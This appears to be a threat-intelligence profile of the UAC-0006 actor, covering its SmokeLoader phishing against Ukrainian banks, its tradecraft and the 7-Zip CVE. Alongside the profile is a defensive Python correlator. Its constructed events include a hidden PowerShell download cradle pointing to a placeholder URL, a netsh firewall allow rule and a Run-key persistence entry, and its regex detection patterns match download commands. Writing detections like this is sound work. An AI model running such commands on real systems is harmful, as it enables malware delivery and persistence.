UAC-0006
UAC-0006 is a financially motivated threat actor tracked by CERT-UA and active since at least 2013. The group is closely associated with SmokeLoader and has repeatedly targeted Ukraine, including Ukrainian financial institutions and customers of PrivatBank. CERT-UA states that at minimum UAC-0006 and UAC-0050 are involved in theft of funds from individuals and legal entities, and has warned of likely fraud involving remote banking systems.

Reported delivery methods include phishing campaigns carrying SmokeLoader in password-protected archives and ZIP attachments, malicious VBS, JavaScript and VBScript files, LNK files, IMG files containing executables, and Microsoft Access .ACCDB documents with macros that launch PowerShell to download payloads. In observed campaigns, UAC-0006 used compromised email accounts, invoice-themed and other business-themed phishing lures, and password-protected attachments to evade email security checks. CERT-UA also reported campaigns in May 2024 distributing SmokeLoader, after which additional malware including TALESHOT and RMS was downloaded; the botnet was assessed to include several hundred infected computers.

Reported execution and post-compromise behavior includes PowerShell, process injection, use of legitimate system binaries, command-and-control communications, persistence via Run keys, firewall rule modification, and delivery of follow-on payloads. CERT-UA reporting also notes SmokeLoader variants that resolve the current A records of configured domains via DNS queries.

UAC-0006 has also been linked in reporting to exploitation of the 7-Zip vulnerability CVE-2025-0411 to deliver SmokeLoader against Ukrainian organizations. In that reporting, the campaign targeted Ukrainian government and private-sector entities and was assessed as likely cyber-espionage despite SmokeLoader's long-standing use in financially motivated operations.
Mentioned targets included Ukrainian state and financial institutions, major manufacturers, public services, and smaller local organizations that could serve as pivot points. Infrastructure and tradecraft directly mentioned in the content include use of Russian registrars such as reg.ru and nic.ru, Russian hosting including macloud.ru and cloudx.ru, and multiple .ru domains in SmokeLoader campaigns. One report states UAC-0006 TTPs overlap with FIN7, indicating possible ties to Russian APT activity, but the content does not establish that UAC-0006 is the same group as FIN7. Known related actor references in the content include UAC-0050 as another CERT-UA-tracked financially motivated group involved in theft activity. No additional confirmed aliases beyond UAC-0006 are provided in the content.
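Added example, not code from the page or from CERT-UA: a small Python correlator that flags the post-delivery chain described above (Access macro launching a PowerShell download, Run key persistence, firewall rule modification) across constructed Sysmon-style events. All hostnames, paths, registry values and the URL are placeholders, and the sample events are constructed for the demonstration.

```python
import re

# Constructed Sysmon-style events (not from the page or any real host), laid out in the
# order the delivery chain described above would leave them: Access macro -> PowerShell
# download -> Run-key persistence -> firewall rule for the dropped binary.
# id 1 = process creation, id 13 = registry value set. Paths, names and URL are placeholders.
OFFICE_DIR = r"C:\Program Files\Microsoft Office\root\Office16"
DROPPED = r"C:\Users\u\AppData\Roaming\svc.exe"
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS01", "image": OFFICE_DIR + r"\MSACCESS.EXE", "parent": r"C:\Windows\explorer.exe",
     "cmd": r'"MSACCESS.EXE" C:\Users\u\Downloads\invoice.accdb'},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": OFFICE_DIR + r"\MSACCESS.EXE",
     "cmd": "powershell -w hidden -c (New-Object Net.WebClient).DownloadString('http://placeholder.example/p')"},
    {"id": 13, "host": "WS01", "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\upd",
     "details": DROPPED},
    {"id": 1, "host": "WS01", "image": r"C:\Windows\System32\netsh.exe", "parent": DROPPED,
     "cmd": 'netsh advfirewall firewall add rule name="svc" dir=in action=allow program="' + DROPPED + '"'},
    {"id": 1, "host": "WS02", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmd": "notepad.exe"},
]

# Stage matchers: Office parent, download cmdlets, Run key path, netsh firewall rule addition.
OFFICE_PARENT = re.compile(r"\\(MSACCESS|WINWORD|EXCEL)\.EXE$", re.I)
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.I)
FIREWALL_ADD = re.compile(r"advfirewall\s+firewall\s+add\s+rule", re.I)

def correlate(events):
    """Map each host to the ordered list of chain stages its events matched."""
    stages = {}
    for ev in events:
        hits = stages.setdefault(ev["host"], [])
        if ev["id"] == 1:
            image = ev["image"].lower()
            if image.endswith("\\powershell.exe") and OFFICE_PARENT.search(ev["parent"]) and DOWNLOAD.search(ev["cmd"]):
                hits.append("office_spawns_powershell_download")
            elif image.endswith("\\netsh.exe") and FIREWALL_ADD.search(ev["cmd"]):
                hits.append("firewall_rule_added")
        elif ev["id"] == 13 and RUN_KEY.search(ev["target"]):
            hits.append("run_key_persistence")
    return stages

def escalate(stages, threshold=2):
    """Hosts with at least `threshold` distinct stages deserve analyst attention."""
    return sorted(host for host, hits in stages.items() if len(set(hits)) >= threshold)

if __name__ == "__main__":
    found = correlate(SAMPLE_EVENTS)
    for host in escalate(found):
        print(host, found[host])
```

A single stage on its own (one Run key write, one netsh call) is routine on many hosts; the escalation threshold is what turns these into a chain worth triaging.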
Tradecraft
13 distinct techniques observed across reporting, grouped by tactic.
Associated malware families
4 malware families attributed to this actor across reporting.
Associated vulnerabilities
1 CVE this actor has used in observed campaigns; it has been exploited in the wild.
Recent activity
8 sources tracked across advisories, community write-ups, and news.
Associated with exploitation of a 7-Zip vulnerability.
Referenced for contrast as a tracked SmokeLoader actor that uses Russian registrars and hosting and targets Ukrainian financial institutions; the report states the ingermany operator is distinct from this actor.
UAC-0006 is conducting phishing campaigns targeting Ukrainian organizations, including PrivatBank, using SmokeLoader malware to steal credentials and sensitive data.
UAC-0006 is conducting payment-themed phishing campaigns targeting PrivatBank customers in Ukraine. The group uses password-protected archives with malicious JS, VBS, or LNK files to deliver SmokeLoader malware, leveraging process injection, PowerShell, and legitimate binaries for payload execution and C2 communication. Their TTPs overlap with FIN7 and other Russian APT groups, indicating possible ties.